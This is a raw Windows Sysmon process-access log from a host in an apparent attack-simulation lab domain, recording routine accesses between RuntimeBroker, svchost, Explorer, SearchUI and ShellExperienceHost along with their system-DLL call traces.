13:30:11.545{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13d1e|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1382d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+180f1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10ec7|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9 10341000x800000000000000011453Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.545{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13711|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+180f1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10ec7|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000011452Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.545{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13624|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+180f1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10ec7|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000011451Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.545{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13d1e|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+180a8|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10ec7|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000011450Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.545{08A6967A-4753-6000-0D05-000000009A01}11165504C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13d1e|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16dde|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16f72|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16e8f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1736c|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce 10341000x800000000000000011449Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.498{08A6967A-4753-6000-0D05-000000009A01}11165504C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.onecore.dll+1a5a3|C:\Windows\system32\windows.cortana.onecore.dll+6118|C:\Windows\system32\windows.cortana.onecore.dll+5b70|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce 10341000x800000000000000011448Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.498{08A6967A-4753-6000-0D05-000000009A01}11165504C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.onecore.dll+1a5a3|C:\Windows\system32\windows.cortana.onecore.dll+1a642|C:\Windows\system32\windows.cortana.onecore.dll+16b12|C:\Windows\system32\windows.cortana.onecore.dll+16a5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011447Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.498{08A6967A-4753-6000-0D05-000000009A01}11165504C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.onecore.dll+1a5a3|C:\Windows\system32\windows.cortana.onecore.dll+6118|C:\Windows\system32\windows.cortana.onecore.dll+169b1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce 10341000x800000000000000011446Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.498{08A6967A-4753-6000-0D05-000000009A01}11165504C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.onecore.dll+1a5a3|C:\Windows\system32\windows.cortana.onecore.dll+6118|C:\Windows\system32\windows.cortana.onecore.dll+5b70|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce 10341000x800000000000000011445Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.498{08A6967A-4288-6000-1100-000000009A01}11921988C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011444Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.482{08A6967A-4753-6000-0D05-000000009A01}11165504C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.onecore.dll+1a5a3|C:\Windows\system32\windows.cortana.onecore.dll+1a642|C:\Windows\system32\windows.cortana.onecore.dll+16b12|C:\Windows\system32\windows.cortana.onecore.dll+16a5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011443Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.482{08A6967A-4753-6000-0D05-000000009A01}11165504C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.onecore.dll+1a5a3|C:\Windows\system32\windows.cortana.onecore.dll+6118|C:\Windows\system32\windows.cortana.onecore.dll+169b1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce 10341000x800000000000000011442Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.451{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011441Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.451{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d966|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f42ac|C:\Windows\System32\TwinUI.dll+f440a|C:\Windows\System32\TwinUI.dll+f4995|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9d35|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011440Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.451{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d8be|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f42ac|C:\Windows\System32\TwinUI.dll+f440a|C:\Windows\System32\TwinUI.dll+f4995|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9d35|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011439Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.435{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d966|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2a62a|C:\Windows\System32\TwinUI.dll+dd966|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011438Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.435{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d8be|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2a62a|C:\Windows\System32\TwinUI.dll+dd966|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011437Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.404{08A6967A-4288-6000-1100-000000009A01}11921876C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x100000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000011436Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.389{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d966|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2a62a|C:\Windows\System32\TwinUI.dll+dd966|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011435Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.389{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d8be|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2a62a|C:\Windows\System32\TwinUI.dll+dd966|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011434Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.389{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d966|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2a62a|C:\Windows\System32\TwinUI.dll+dd966|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011433Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 